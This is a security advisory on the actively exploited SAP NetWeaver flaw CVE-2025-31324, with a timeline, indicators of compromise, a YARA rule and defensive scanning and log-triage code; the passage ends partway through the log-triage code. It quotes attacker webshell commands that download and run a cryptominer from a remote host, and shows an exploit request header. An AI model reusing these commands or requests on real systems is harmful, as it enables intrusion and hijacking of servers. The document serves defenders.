SAP NetWeaver Flaw Lets Hackers Take Full Control: CVE-2025-31324 Explained


Latest update: May 7, 2025 at 6:00 p.m. The Onapsis Research Labs captured and analyzed real exploit samples through our SAP Threat Intelligence sensor network, allowing us to reconstruct zero-day attacks showing full remote command execution (RCE). The publicly discussed artifacts (i.e., the webshells) represent adversarial behavior from the broader attack campaign. However, RCE commands appear to be used in the reconnaissance phase and then webshells were deployed via RCE. The observed exploit demonstrates highly advanced knowledge of SAP from the threat actor group responsible. Living-off-the-land compromise and webshell-less persistence is possible based on the Onapsis-observed payload, and defenders should adjust IR playbooks accordingly. This continues to be an active and evolving investigation, and ORL is collaborating very closely with SAP security teams. It is highly recommended that all SAP customers ensure that they have applied the emergency patch from SAP (Security Note #3594142) released on April 24, 2025.

As of April 30, Onapsis Research Labs has released a YARA rule, derived from the attack campaign, that identifies positive webshell access to aid cybersecurity teams at organizations who have deployed SAP as well as the broader security community. This YARA rule has been updated to reflect additional, known webshells as of May 5, 2025.

Summary of CVE-2025-31324

  • A zero-day SAP vulnerability with CVSS score of 10.0 is being actively exploited in the wild.  
  • CVE-2025-31324 affects SAP Visual Composer, allowing unauthenticated threat actors to upload arbitrary files, resulting in immediate full compromise of the targeted system.
  • SAP Visual Composer is not installed by default, but is broadly enabled because it was a core component used by business process specialists to develop business application components without coding.
  • First public report was via a public blog posted by security research firm ReliaQuest on April 22, 2025.
  • SAP rapidly released an emergency patch for this issue on April 24, 2025 at approximately 1:00 PM EST (US).
  • In forensic response to the public report, evidence of active exploitation was noted by Onapsis Threat Intelligence and reported by multiple IR firms and security researchers.
  • On April 27, 2025 Onapsis Research Labs released an open-source scanner for CVE-2025-31324. Please see the Open-Source Scanner for CVE-2025-31324 section below for more information.
  • On April 29, 2025, CISA added the CVE to their Known Exploited Vulnerabilities Catalog.
  • As of April 30, 2025, Onapsis Research Labs is seeing significant activity from attackers who are using public information to trigger exploitation and abuse webshells placed by the original attackers, who have currently gone dark.
  • As of May 5, 2025, Onapsis Research Labs and other security firms are seeing evidence of follow-up, opportunistic attackers using previously established webshells from the prior attack campaign in order to stage new attacks.

Active Campaign Details & Timeline of CVE-2025-31324

Active Exploitation of this SAP Zero-Day Vulnerability in the Wild

  • From January 20, 2025 until February 10, 2025, Onapsis Research Labs saw reconnaissance activity, testing with specific payloads against this vulnerability, within our global honeypot network. 
  • After February 10, 2025, the reconnaissance activity decreased, and we began to see exploitation attempts.
  • Some organizations have reported to Onapsis seeing successful compromises deploying webshells in March 2025, specifically between March 14th and March 31st. Mandiant noted that their first known exploitation via incident response occurred on March 12, 2025.
  • Rapid7 noted that their “MDR has observed exploitation in multiple customer environments dating back to at least March 27, 2025.”
  • On April 22, 2025 ReliaQuest publicly reported observations. Their assessment, based on the fact that exploitation occurred on systems with recent patches, was that it likely involved the use of an unreported RFI issue against public SAP NetWeaver servers.
  • On April 22, 2025, SAP acknowledged the issue and updated an existing SAP KBA 3593336 (“Unfamiliar files found in SAP NetWeaver Java file system”), linking the existing KBA about unfamiliar files to this campaign. The FAQ document (SAP Note 3596125, released April 24, 2025) confirmed that unfamiliar files like ‘.jsp’, ‘.java’, or ‘.class’ in specific paths like …\irj\root, …\irj\work, and …\irj\work\sync are common targets and should be considered malicious.
  • On April 24, 2025, SAP officially identified the vulnerability as CVE-2025-31324, described as a “Missing Authorization check in SAP NetWeaver (Visual Composer development server)”. SAP identified an improper authorization check could allow an unauthenticated agent to upload potentially malicious executable binaries.
  • In forensic response, the Onapsis Research Labs obtained evidence of active exploitation of this zero-day vulnerability, noted by the exclusive Onapsis Threat Intelligence. Onapsis observed this activity on Internet-facing SAP applications and was also contacted by SAP customers who shared insights into the topic. Concurrently, multiple Incident Response firms and security researchers were also reporting observing active exploitation.
  • On April 29, 2025, CISA officially added the CVE to its Known Exploited Vulnerabilities Catalog for actively exploited vulnerabilities in the wild.
  • On April 30, 2025, SAP updated SAP Note #3593336 to include a new workaround (“Option 0: Complete removal of sap.com/devserver_metadataupload_ear application”) which is their new recommended workaround to completely remove the application from the vulnerable systems that cannot be patched.
  • As of April 30, 2025, the original attackers have gone quiet. However, it is reasonable to expect that their prior exploits were captured and could be used in future attacks by other threat actor groups. 
  • As of April 30, 2025, Onapsis Research Labs is also seeing significant activity from many opportunistic attackers who are using publicly available information to trigger exploitation and abusing webshells placed by the original attackers.
  • On May 1, 2025, SAP re-released SAP Security Note #3594142 (v18) that expanded patching support to include SAP NetWeaver 7.5 systems on earlier service packs, now starting with SP 020.
  • On May 2, 2025, Mandiant & Onapsis released an open source tool and threat briefing to help organizations identify Indicators of Compromise (IoCs) associated with active in-the-wild exploitation of CVE-2025-31324.
  • As of May 5, 2025, Onapsis Research Labs, other security firms, and other incident responders confirm that they are seeing a second wave of attacks staged by follow-on, opportunistic threat actors who are leveraging previously established webshells (from the first zero-day attack) on vulnerable systems. 
  • As of May 6, 2025, Onapsis Research Labs and other incident responders are seeing webshells with randomized names of varying length instead of the previously observed webshells with randomized 8-character names. 
  • As of May 6, 2025, Onapsis Research Labs has determined that, while representative of the broader campaign adversarial behavior, the publicly discussed webshells were likely uploaded via remote command execution (RCE) after other RCE commands were executed during the reconnaissance phase of the original attack, demonstrating a threat actor group with highly advanced knowledge of SAP. This means that “living-off-the-land” compromise and persistence is possible without webshells, based on the Onapsis-observed payload. 
  • As of May 6, 2025, the Mandiant and Onapsis compromise assessment tool has been updated to include functionality to examine logs for evidence of exploit or webshell access.
  • It is exceedingly important for all SAP customers to deploy SAP Security Note 3594142 to remove unauthenticated access to the vulnerable component on affected systems.

Indicators of Compromise

SAP has provided guidance on determining if systems have already been compromised in SAP Note #3596125 – this note details the following steps:

Check the root of the following OS directories for the presence of ‘jsp’, ‘java’, or ‘class’ files.

  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
  • C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync

The presence of these files is an indication an attacker has leveraged the vulnerability to upload arbitrary files. The system should be considered compromised and the appropriate incident response plan should be followed.

The following terminal listing (shown as an image in the original post) illustrates a potential review of a given SAP Application:

[root@sapserver irj]# pwd
/usr/sap/<SID>/<INSTANCE>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj
[root@sapserver irj]# find . -type f -name "*.jsp" -ls
[root@sapserver irj]# find . -type f -name "*.java" -ls
[root@sapserver irj]# find . -type f -name "*.class" -ls

Observed Tactics

Different tactics have been observed by the Onapsis Research Labs (ORL), mapped to the MITRE ATT&CK Framework:

  • T1190 (Exploit Public-Facing Application)
  • T1505.003 (Server Software Component: Web Shell) 

Below is a collection of observed IOCs from ORL research, ORL incident response collaborations, and Mandiant incident response activities:

  • helper.jsp – Observed in multiple reports
  • cache.jsp – Observed in CVE-related reports
  • forwardsap.jsp
  • coresap.jsp
  • webhelp.jsp
  • .webhelper.jsp – Hidden variant
  • usage.jsp – Possibly a renamed “helper.jsp”
  • usage1.jsp – Variant of usage.jsp
  • 404_error.jsp – Potentially a disguised webshell
  • .h.jsp – Hidden file variant 

Malicious Webshell Filenames Identified with Associated Hashes (SHA256):

  • coresap.jsp webshell:
    4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d
  • Random 8-character names ([a-z]{8}).jsp
    b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee

Note: Onapsis Research Labs (ORL) and other incident responders are now beginning to see webshells with randomized names of varying lengths – not just random 8-character names. ORL continues to monitor and will provide further updates.

Additionally, the ReliaQuest research team provided the following IOCs to search across SAP Applications: 

  • Helper.jsp webshell: 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087
  • Cache.jsp webshell: 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf

Note: The ReliaQuest blogpost was recently updated (May 2, 2025) with additional IOCs from their investigations.
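As an added example (not the code of the Onapsis/Mandiant scanner or of any tool named in this post), the following Python script walks the irj subdirectories named in SAP Note 3596125, flags every .jsp/.java/.class file found there, and compares each file's SHA-256 and filename against the hashes and filenames listed above. The hash and name lists are copied from this post; the directory tree built in demo() and the file contents in it are constructed solely to exercise the code. On a real system, point scan_irj() at the .../sap.com/irj/servlet_jsp/irj directory.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# SHA-256 values published in this post for campaign webshells.
KNOWN_WEBSHELL_HASHES = {
    "4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d": "coresap.jsp",
    "b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee": "random [a-z]{8}.jsp",
    "1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087": "helper.jsp",
    "794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf": "cache.jsp",
}
# Webshell filenames listed in this post (compared case-insensitively).
KNOWN_WEBSHELL_NAMES = {
    "helper.jsp", "cache.jsp", "forwardsap.jsp", "coresap.jsp", "webhelp.jsp",
    ".webhelper.jsp", "usage.jsp", "usage1.jsp", "404_error.jsp", ".h.jsp",
}
# The random 8-character names observed in the first wave.
RANDOM_NAME_RE = re.compile(r"^[a-z]{8}\.jsp$")
# Directories below .../sap.com/irj/servlet_jsp/irj named in SAP Note 3596125;
# "work" is walked recursively, so "work/sync" is covered as well.
IRJ_SUBDIRS = ("root", "work")
WEB_EXEC_SUFFIXES = {".jsp", ".java", ".class"}


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(name, digest):
    """Rank a web-executable file: published hash > published name > unknown."""
    if digest in KNOWN_WEBSHELL_HASHES:
        return "known-webshell-hash:" + KNOWN_WEBSHELL_HASHES[digest]
    lowered = name.lower()
    if lowered in KNOWN_WEBSHELL_NAMES or RANDOM_NAME_RE.match(lowered):
        return "known-webshell-name"
    # SAP says these directories should hold no jsp/java/class at all, so
    # anything unmatched is still a finding, just without campaign attribution.
    return "unknown-web-executable"


def scan_irj(irj_dir):
    """Return sorted (relative path, sha256, verdict) tuples for every
    .jsp/.java/.class file under the irj subdirectories that should contain none."""
    irj_dir = Path(irj_dir)
    findings = []
    for sub in IRJ_SUBDIRS:
        base = irj_dir / sub
        if not base.is_dir():
            continue
        for entry in base.rglob("*"):
            if entry.is_file() and entry.suffix.lower() in WEB_EXEC_SUFFIXES:
                digest = sha256_of(entry)
                rel = entry.relative_to(irj_dir).as_posix()
                findings.append((rel, digest, classify(entry.name, digest)))
    return sorted(findings)


def demo():
    """Build a constructed irj tree in a temp dir (sample data, not from a real
    system; every file holds the placeholder bytes b"abc") and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        irj = Path(tmp) / "irj"
        (irj / "root").mkdir(parents=True)
        (irj / "work" / "sync").mkdir(parents=True)
        (irj / "root" / "helper.jsp").write_bytes(b"abc")      # listed name
        (irj / "root" / "qwertyui.jsp").write_bytes(b"abc")    # random 8-char pattern
        (irj / "work" / "sync" / "Foo.class").write_bytes(b"abc")  # unknown artifact
        (irj / "root" / "notes.txt").write_bytes(b"abc")       # ignored: not web-executable
        return scan_irj(irj)


if __name__ == "__main__":
    for rel, digest, verdict in demo():
        print(f"{verdict:28} {digest[:16]}...  {rel}")
```

Because the file contents are placeholders, demo() never produces a hash match; on a real system a "known-webshell-hash" verdict ties the file to the published campaign sample, while "unknown-web-executable" findings still warrant collection and review, since SAP's guidance is that no such files belong in these directories.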

Secondary, Opportunistic Attacks

As part of the original zero-day attack, webshells were established on vulnerable SAP NetWeaver systems. As the Onapsis Research Labs noted on April 30th, the original attackers may have gone quiet, but the ongoing threat continued, as a secondary wave of opportunistic attackers were using publicly available information to trigger exploitation and abusing the webshells placed by the original attackers.

In just one example, the Onapsis Research Labs observed multiple command attempts that ultimately were unsuccessful on a single SAP system:

https://<sap_server>/irj/helper.jsp?cmd=curl%20-o%20/tmp/8bq.sh%20http://23.95.123.5:666/xmrigCCall/8bq.sh
https://<sap_server>/irj/helper.jsp?cmd=chmod%20777%20/tmp/8bq.sh
https://<sap_server>/irj/helper.jsp?cmd=/tmp/8bq.sh
https://<sap_server>/irj/helper.jsp?cmd=rm%20/f%20/tmp/8bq.sh

In a recent blogpost dated April 30, WithSecure Labs also noted uncovering a sophisticated attack that leveraged an existing webshell to attempt XMRig Coin Miner deployment:

cmd /c certutil -urlcache -split -f hxxp://23.95.123[.]5:666/xmrigCCall/1110.exe C:\Users\Public\1110.exe 

IOCs (from their blogpost): 
272b2fc48f6cbbf105cbe961b163de99e761b31d
925f6bc2a3fb5bb15a434f5f42196d49f36459e3
65.49.235[.]210
23.95.123[.]5

IP Addresses

A large number of IP addresses were observed as part of this active attack campaign through Onapsis research, Onapsis Research Labs incident response collaborations, as well as courtesy of other IR and security firms. We’ve broken down the list of observed IPs by source for clarity and convenience.

1) IP Addresses Observed Prior to April 22, 2025 as Part of Onapsis Research Labs Research and Investigation:

  • 50.114.94.55
  • 50.114.94.56
  • 50.114.94.57
  • 50.114.94.68
  • 50.114.94.72
  • 50.114.94.74
  • 50.114.94.86
  • 50.114.94.91
  • 50.114.94.95
  • 50.114.94.97
  • 50.114.94.100
  • 50.114.94.104
  • 63.135.161.220
  • 63.135.161.223
  • 63.135.161.224
  • 63.135.161.226
  • 63.135.161.229
  • 63.135.161.235
  • 63.135.161.242
  • 63.135.161.245
  • 85.239.54.153
  • 91.193.19.36
  • 142.111.152.19
  • 142.111.152.20
  • 142.111.152.23
  • 142.111.152.24
  • 199.101.196.85
  • 212.30.36.171
  • 212.30.36.173
  • 212.30.36.175
  • 212.30.36.176
  • 212.30.36.183
  • 212.30.36.200
  • 212.30.36.206
  • 212.30.36.215
  • 212.30.36.218
  • 212.30.36.219
  • 212.30.36.228
  • 212.30.36.231
  • 212.30.36.232
  • 212.30.36.234
  • 216.73.161.8
  • 216.73.161.15
  • 216.73.161.17
  • 216.73.161.18
  • 216.73.161.20
  • 216.73.161.21
  • 216.73.161.22
  • 216.73.161.25
  • 216.73.161.26

2) IP Addresses Observed through Onapsis Research Labs IR Engagement Collaborations

  • 91.193.19.36
  • 91.218.50.174
  • 206.189.229.132
  • 159.89.93.5
  • 104.248.236.95
  • 142.93.63.24
  • 134.122.26.60
  • 137.184.197.225
  • 167.99.11.36
  • 204.48.22.207
  • 143.198.173.194
  • 167.99.150.59
  • 37.49.228.122
  • 206.188.197.52
  • 85.239.54.153
  • 192.42.116.200
  • 103.207.14.236
  • 104.28.212.150
  • 104.28.244.150
  • 136.144.35.191
  • 136.144.35.192
  • 136.144.35.196
  • 136.144.35.197
  • 136.144.35.199
  • 136.144.35.200
  • 136.144.35.201
  • 136.144.35.202
  • 136.144.35.203
  • 136.144.35.204
  • 136.144.35.205
  • 136.144.35.206
  • 136.144.35.207
  • 136.144.35.213
  • 89.187.164.96
  • 136.144.35.210
  • 136.144.35.211
  • 136.144.35.189
  • 136.144.35.214

3) IP Addresses Reported Publicly by Other IR and Security Firms

Thanks to Red Canary, CrowdSec, and WithSecure Labs for their public contributions to support the SAP defenders with this critical CVE.

  • Red Canary IP addresses can be found in their blogpost from April 30, 2025 here.
  • CrowdSec IP Addresses can be found here.
  • WithSecure Labs noted IP addresses from follow-on attacks in their blogpost here.

The Onapsis Research Labs is always looking for opportunities to collaborate with incident response and security firms. If you have indicators of compromise you want to share, want us to reference or link to your findings / analyses, or have other joint collaboration ideas, please contact us at [email protected].

Vulnerability Overview

SAP Zero-Day Vulnerability (CVE-2025-31324) Overview

Affected Component: The vulnerability exists in the SAP Visual Composer component for SAP NetWeaver 7.xx (all SPS), specifically within the “developmentserver” part of the application. This component is part of the SAP NetWeaver Java stack. While not installed by default, it is widely enabled across existing SAP NetWeaver Application Server Java systems due to its broad usefulness in assisting business process specialists with developing business components without the use of coding.

Root Cause: The fundamental issue is an improper authentication and authorization check in the application: the Metadata Uploader is not protected when an unauthenticated user invokes some of its functionality.

Criticality: The vulnerability has been graded with a CVSS of 10, since it allows for a full system compromise, if successfully exploited.

Exploitation Method: The vulnerability is exploitable through HTTP/HTTPS, potentially over the Internet. Attackers target the /developmentserver/metadatauploader URL by sending carefully crafted GET, POST, and HEAD HTTP requests.

Authentication Requirement: No authentication is required to exploit it, allowing an unauthenticated agent or threat actor to interact with the vulnerable component.

Technical Impact: While previously thought to be limited to arbitrary file upload, further investigation from Onapsis Research Labs has identified that this is actually remote command execution (RCE). The publicly discussed artifacts (i.e., the webshells) are representative of the broader adversarial behavior from the initial attack campaign. Threat actors can upload (and have uploaded) potentially malicious code files, most commonly webshells. Examples of filenames observed include “helper.jsp” and “cache.jsp”. However, the Onapsis Research Labs investigation has concluded that this was likely done via RCE after prior reconnaissance was done with RCE commands. This means that while the presence of webshells as noted here and in other places serve as viable indicators of compromise for the specific active campaign, the ability for a threat actor to “live off the land” (i.e., “webshell-less”) and achieve full compromise and persistence is entirely possible.

Attack Surface: While the SAP Visual Composer component is an optional component to install, Onapsis research indicates this component is installed and enabled in at least 50% of Java systems, with the research indicating the percentage could be as high as 70%.

Exploitation Details

It is important to stress that as of the latest update to this post, no publicly available exploit code has been published. However, be aware that exploits do exist and have been actively used in the wild. Onapsis Research Labs will continue to update this resource with further guidance and additional information as it is uncovered.

Exploitation happens via a POST, HEAD, or GET request to the vulnerable component. Upon successful exploitation, threat actors are able to execute arbitrary commands (RCE). Threat actors have been observed uploading webshells to vulnerable systems. These webshells allow the threat actor to execute arbitrary commands in system context, with the privileges of the <sid>adm Operating System user, giving them full access to all SAP Resources.

POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/octet-stream
Content-Length: 3200

<POST_BODY_REDACTED>

Example of exploitation of the vulnerability

Business Impact of CVE-2025-31324

With <sid>adm access, the attacker gains unauthorized access to the underlying SAP Operating System using the user and privileges of the processes running in the SAP Application Server, implying full access to any SAP resource, including the SAP system database without any restrictions, permitting them to take several actions (e.g., shut down the SAP application or deploy ransomware). 

Additionally, the system can be used as a foothold into a network for the attacker to pivot from this initial entry point and access other internal systems, taking advantage of the interconnected nature of SAP systems.

As always, the potential for immediate full compromise is a serious matter and one that should be prioritized by your team. It could lead to malicious and unauthorized business activity affecting critical SAP systems, including but not limited to modifying financial records, deploying ransomware, viewing personally identifiable information (PII), corrupting business data, and deleting or modifying logs, traces, and other actions that jeopardize essential business operations.

Furthermore, for organizations subject to strong regulatory requirements (e.g., US: SEC Rules on Cybersecurity; EU: NIS2) or industry compliance frameworks (e.g., Sarbanes-Oxley, NERC), the resulting deficiency in IT controls for such regulatory or compliance mandates could be significant and far reaching, including (but again not limited to) corporate liability for corrupted or modified data, exfiltration of sensitive and/or financial data, and the exposure of PII.

Patching for CVE-2025-31324, mitigation if you are unable to patch, and – if exposed – compromise assessment should all be critical priorities.

Assessing Exposure

In order to determine if your systems are vulnerable, you need to list the Components of the SAP System – for each Java system. If either VISUAL COMPOSER FRAMEWORK or VCFRAMEWORK is listed as installed, then the system has the targeted component.

The following screenshot illustrates the listing of components, filtered by the affected component, which is VCFRAMEWORK. This can be obtained by navigating to the homepage of the SAP NetWeaver Application Server Java → System Information → Components Info (tab).

Image 1: Example of a vulnerable component version.

You then need to manually review whether the patch from SAP Security Note #3594142 has been applied or one of the mitigations in SAP KB #3593336 has been implemented. For Onapsis customers, please review the Onapsis Platform Coverage section in this article to see how this assessment can be done automatically across your entire landscape.

Remediation Steps & Recommendations for CVE-2025-31324

SAP Resources

SAP has released the following notes to help customers protect themselves from this active threat:

  • SAP Security Note #3594142 – Provides the hot fix support packages to help patch the vulnerability. Also points to SAP Note #3596125 and initial manual actions to identify evidence of prior exposure
  • SAP Note #3596125 – FAQ for Security Note #3594142. Please note that this document is evolving, and SAP continues to update and evolve this FAQ and guidance.  
  • SAP Note #3593336 – Provides workaround mitigation steps for customers that cannot apply the patch. Note that, as of April 30, SAP has updated this note with a new workaround (“option 0”) which is the new recommended mitigation.

Need to scan your environment? Learn more about our free Indicators of Compromise Scanner released in partnership with Mandiant.

Onapsis Platform Coverage

The Onapsis team published comprehensive support for this vulnerability on April 24, 2025, the day SAP’s emergency patch was published.

  • Onapsis Assess supports identifying all SAP systems with the vulnerable component.
    • Run updated Module 459 “Check missing JAVA SAP Security Notes” to find the vulnerability and review findings for OKBID MNJ_3594142.
    • Run new Module 1059 “[CVE-2025-31324] Missing Authorization check in SAP NetWeaver (Visual Composer development server)” to check if any of the workarounds detailed in SAP Note #3593336 have been implemented. If so, Assess reports a MEDIUM vulnerability (i.e., because you still have the vulnerable component, it is just not currently accessible) and returns issue SAP_105950.
  • Onapsis Defend monitors and alerts on POST, GET, and HEAD requests to an unpatched SAP Visual Composer component.
    • Defend rule released April 24. ID is 74b6519b3821d7be9ac1d0c259c5d3c2.
    • Defend update issued April 25 to include that rule in the shipped Incident Profile, “OP_Shipped_SOC_JAVA”.
  • A Threat Intel Center article was published, providing both details on the vulnerability and exploitation and a central location to view all vulnerable systems and any attempts to interact with the vulnerable component.

As of April 30, 2025, Onapsis has expanded on our platform support to help users with further compromise assessment.

  • Onapsis Assess supports deeper analysis of Java systems for indicators of compromise related to this vulnerability
    • Run Module 1060 “[CVE-2025-31324] Check for Existence of Indicators of Compromise from Known Campaigns Targeting Visual Composer Development Server” to flag if any webshells known from the campaign are found.
    • Run Module 1061 “[CVE-2025-31324] Check for Existence of Indicators of Compromise not from Known Campaigns Targeting Visual Composer Development Server” to flag potentially more targeted attacks on your organization.
  • Onapsis Defend will detect access to known webshells in your environment
    • Defend rule has been added to the “OP_Shipped_SOC_JAVA” Incident Profile.
  • Threat Intel Center has been updated to include the new modules and rules listed above.
  • Onapsis Network Detection Rule Pack (NDRP)
    • A new signature has been added to NDRP allowing network security tools to identify traffic containing attempts to exploit the vulnerability.

Existing Onapsis Assess customers can run an assessment scan against their entire landscape to identify systems with the vulnerable component installed and unpatched, with no workaround/mitigation applied. Ongoing automatic scanning can track your progress addressing the vulnerable systems and removing the risk of compromise in your environment. Additional Assess modules will check Java systems for IoCs related to this vulnerability.

While remediation work is underway, Onapsis Defend customers have automatic monitoring of interactions with the vulnerable component. Due to the reduced level of detail captured in POST, GET, and HEAD requests in SAP system logging, Defend cannot detect the presence of a webshell or other payload in these requests themselves, but it can alert if the requests are made to a vulnerable SAP Visual Composer component. An additional Defend rule can alert on access to known webshells in your SAP environment.

On April 25, 2025, Onapsis offered two live briefings providing details on the vulnerability, the active exploitation, and mitigation guidance. A third session was held on April 29, 2025. Click here to watch an on-demand video of that session. Some of the most common questions we received across our sessions have been listed below for your reference. Due to the overwhelming response, we hosted another threat briefing in collaboration with Mandiant on May 7, where we discussed the current state of the attack campaign. That session can be viewed on-demand here.

Ongoing guidance continues to be published for our clients within the Onapsis SAP Defenders Community. This guidance will be updated as new information continues to be uncovered about this threat and its impact. The Onapsis SAP Defenders Community provides a forum for Onapsis customers to learn ongoing threat intelligence, gain access to exclusive resources, interact directly with Onapsis experts, and collaborate with other SAP security professionals.

Open-Source Scanners for CVE-2025-31324

Whitebox Indicators of Compromise (IoCs) scanner

Onapsis, in collaboration with Mandiant, has developed and released an open source tool to identify Indicators of Compromise (IoCs) on potentially-affected SAP systems. This tool enables defenders to:

  • Detect whether the system is vulnerable to CVE-2025-31324
  • Identify known Indicators of Compromise (IOCs) related to available campaign information
  • Scan for unknown web-executable files in known exploit paths
  • Collect suspicious files into a structured ZIP archive with a manifest for future analysis
  • Scan HTTP Access logs for evidence of access to the vulnerable component or suspicious artifacts
  • Collect extracted log entries for future analysis

Download the tool from the Onapsis Github repository here.

Blackbox Vulnerability Scan and Remote Known Webshell Detection

In order to support defenders with exposure and compromise assessments, Onapsis Research Labs (ORL) has created an open source scanner allowing SAP customers to analyze their environment in a non-intrusive manner to identify if any of their systems are vulnerable to CVE-2025-31324, which continues to be actively exploited in the wild.

This tool will execute a non-intrusive remote scan via IP address to determine the following:

  1. Is the affected component present or not present?
  2. Is the affected component patched or not patched?
  3. Are the known webshells present or not present?

Download the tool from the Onapsis Github repository here.

As this continues to be a developing situation, Onapsis Research Labs will continue updating these tools as more information is known. The tools include functionality to check if there is a newer revision available for download as well to help make sure your teams are always using the most current version from the ORL.

Please note that these tools are provided from Onapsis licensed under the Apache License, Version 2.0. These tools are a contribution to the security, incident response, and SAP communities to aid in response to active exploitation of CVE-2025-31324. We consider the tools to be “under development” and will be iterated rapidly as more information becomes available either from Onapsis Research Labs or publicly. As always, this is a best-effort development and offered “as-is” with no warranty or liability. We strongly recommend complementing these tools’ usage with a thorough review of potentially vulnerable and compromised systems. 

YARA

To aid defenders at organizations running SAP as well as the broader security community, the Onapsis Research Labs has created a YARA rule to help identify successful access to the webshells placed by the attack campaign:

rule detect_CVE202531324_webshells_by_name
{
    meta:
        description = "Detects the known webshell file names that are uploaded in the root directory"
        author = "Emanuela Ionas, Onapsis Research Labs"
        date = "2025-05-05"
        tags = "CVE-2025-31324"
    strings:
        $webshell_1 = "/irj/cache.jsp" nocase
        $webshell_2 = "/irj/helper.jsp" nocase
        $webshell_3 = "/irj/forwardsap.jsp" nocase
        $webshell_4 = "/irj/coresap.jsp" nocase
        $webshell_5 = "/irj/webhelp.jsp" nocase
        $webshell_6 = "/irj/.webhelper.jsp" nocase
        $webshell_7 = "/irj/usage.jsp" nocase
        $webshell_8 = "/irj/usage1.jsp" nocase
        $webshell_9 = "/irj/404_error.jsp" nocase
        $webshell_10 = "/irj/.h.jsp" nocase
        $webshell_regex = /\/irj\/[._a-zA-Z0-9]{2,10}\.jsp/
        $status = /HTTP\/[12]\.[012]\s+200/
    condition:
        ($webshell_1 or $webshell_2 or $webshell_3 or $webshell_4 or $webshell_5 or $webshell_6 or $webshell_7 or $webshell_8 or $webshell_9 or $webshell_10 or $webshell_regex) and $status
}
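Added example, not part of this post and not the code of the Onapsis YARA rule or Defend rules: the Python below applies the same conditions as the YARA rule above (a listed webshell path, or the same [._a-zA-Z0-9]{2,10}.jsp pattern, together with a 200 status) to individual access-log lines, and additionally flags every request to /developmentserver/metadatauploader, as the Defend rule described earlier does, plus non-200 probes of webshell paths. It assumes Apache combined log format; a real SAP NetWeaver Java HTTP access log may need a different LOG_RE. Every line, address and timestamp in SAMPLE_LOG is constructed (RFC 5737 documentation addresses).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Webshell paths from this post (same set as the YARA rule's $webshell_1..10).
KNOWN_WEBSHELL_PATHS = {
    "/irj/cache.jsp", "/irj/helper.jsp", "/irj/forwardsap.jsp", "/irj/coresap.jsp",
    "/irj/webhelp.jsp", "/irj/.webhelper.jsp", "/irj/usage.jsp", "/irj/usage1.jsp",
    "/irj/404_error.jsp", "/irj/.h.jsp",
}
# Same pattern as the YARA rule's $webshell_regex, anchored to the whole path.
WEBSHELL_PATH_RE = re.compile(r"^/irj/[._a-zA-Z0-9]{2,10}\.jsp$")
# Endpoint of the vulnerable Visual Composer metadata uploader.
VULN_ENDPOINT = "/developmentserver/metadatauploader"

# Assumption: Apache combined log format (client, method, target, protocol, status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[12]\.[012])" '
    r'(?P<status>\d{3}) '
)

# Constructed sample lines; none of these come from a real system.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Apr/2025:03:12:44 +0000] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Apr/2025:03:13:02 +0000] "GET /irj/helper.jsp?cmd=id HTTP/1.1" 200 87 "-" "curl/8.0.1"',
    '198.51.100.7 - - [02/May/2025:11:40:19 +0000] "GET /irj/qwertyui.jsp HTTP/1.1" 200 64 "-" "python-requests/2.31"',
    '198.51.100.7 - - [02/May/2025:11:40:20 +0000] "GET /irj/portal HTTP/1.1" 200 3021 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [03/May/2025:08:05:51 +0000] "GET /irj/cache.jsp?cmd=whoami HTTP/1.1" 404 221 "-" "-"',
]


def triage_line(line):
    """Return a finding dict for a suspicious request, or None for benign or unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    path, status = target.path, int(m["status"])
    finding = {"ip": m["ip"], "ts": m["ts"], "method": m["method"], "path": path, "status": status}
    if path == VULN_ENDPOINT:
        # Any interaction with the unpatched component is worth an alert, whatever the status.
        finding["verdict"] = "metadatauploader-request"
        return finding
    if path.lower() in KNOWN_WEBSHELL_PATHS or WEBSHELL_PATH_RE.match(path):
        # The YARA rule only fires on 200 (successful access); a non-200 hit still
        # shows someone probing for a shell, e.g. after the file was removed.
        finding["verdict"] = "webshell-access" if status == 200 else "webshell-probe"
        finding["cmd"] = parse_qs(target.query).get("cmd", [""])[0]
        return finding
    return None


def triage_log(lines):
    """Run triage_line over every line and keep only the findings, in log order."""
    return [f for f in (triage_line(line) for line in lines) if f]


def correlated_sources(findings):
    """Client IPs that both touched the metadata uploader and reached a webshell."""
    uploader = {f["ip"] for f in findings if f["verdict"] == "metadatauploader-request"}
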